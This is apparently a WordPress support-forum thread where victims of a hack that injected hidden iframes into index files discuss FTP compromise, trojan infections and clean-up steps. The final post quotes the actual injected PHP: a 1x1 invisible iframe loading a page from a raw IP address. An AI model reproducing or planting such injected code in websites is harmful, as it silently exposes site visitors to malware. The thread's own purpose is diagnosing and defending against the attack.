iFrame Hack on Several WP Sites

@xinfo

In my case this was webhosting problem. Not much I could do about server having hacker doing whatever he wants on it.

I fully understand that in many cases user is one to blame. However it is not the only option and it is reckles to assume that WordPress and hosting are at all times absolutely secure.

I had the same hack on WP 2.7 (my fault for not updating to the newest version). In the server log was the ftp record for this day. Seems to be an automated script that downloads only files with “index” in the filename. The iframe is copied inside and the file will be uploaded back to the server. The whole operation was done through proxy servers, so it’s difficult to track.

It was easy to check all the files, because they had the same timestamp with the data and time of the modification.

However, where is the hole to get ftp access…?

Thomas_Kr,

thats the perfect signature for malware.

they got it (the hole) from you. you have malware on a machine youve been using or youre using insecure wireless connections or internet cafe connections, or or or …..

I’ve had the same. an iFrame appearing on the top and bottom of blog pages – dropping viruses and trying to interfer with the local machine. SpyDr spotted something it didn’t like in Acrobat 8. No sooner had this appeared than there was a hoax windows style security alert which led to a Total Security installation and a trojan dropping onto the PC. It all leaves a nasty taste in the mouth!

I could see the iFrame in the source but not where it was coming from. I did find that index.php contained an instance of this iFrame (I had 2 infected sites sharing the same MySQL DB) but deleting that (and instantly changing the FTP on this thread’s advice) didn’t seem to do it, I can only think that there must have been more than one file injecting this code into the pages.

I’m now running a reinstall of all admin and include files and this seems to be doing the trick. I’ll be interested to hear how to stop this happening in future.

I have this problem too and it is related with server!

I partly solve problem, chmod all index files to 400, only to read. Ago 4 month this happen first time and i chmod files to 400. No problem 4 month and today happen again with 3 files. I now again chmod all index’s to 400 and will see what will be.

Regards, Mladen
https://www.besplatnifilmovi.biz

I have several WordPress blogs now showing the dreaded malware warning. 2 of these sites also have an index.html and normal html pages. iframe code is showing up on all pages. I upload from a Mac, and have no idea how to scan for viruses. I thought Macs don’t have them? I feel like dumping WordPress, as I am not technical enough to track this down. I would rather clean out the problem, but where to begin? Do I really have to open every file in WordPress and look for I don’t know what? If I can get the sites cleaned, I’ll follow the instructions for Hardening WordPress. There aren’t enough hours in the day to understand this stuff.

same problem to me
i have to blog
https://www.jinahe.com
https://info.jinahe.com

Just wondering if people are still having this problem. We got hit over the weekend.
<?php echo ”; ?><?php echo ”; ?><?php echo ‘<iframe src=”https://91.201.28.6/goods/index.php&#8221; width=”1″ height=”1″ frameborder=”0″></iframe>’; ?>
I would not have noticed if it wasn’t loading the pages to the bottom.
Any updates on why this is happening or how to defend against it?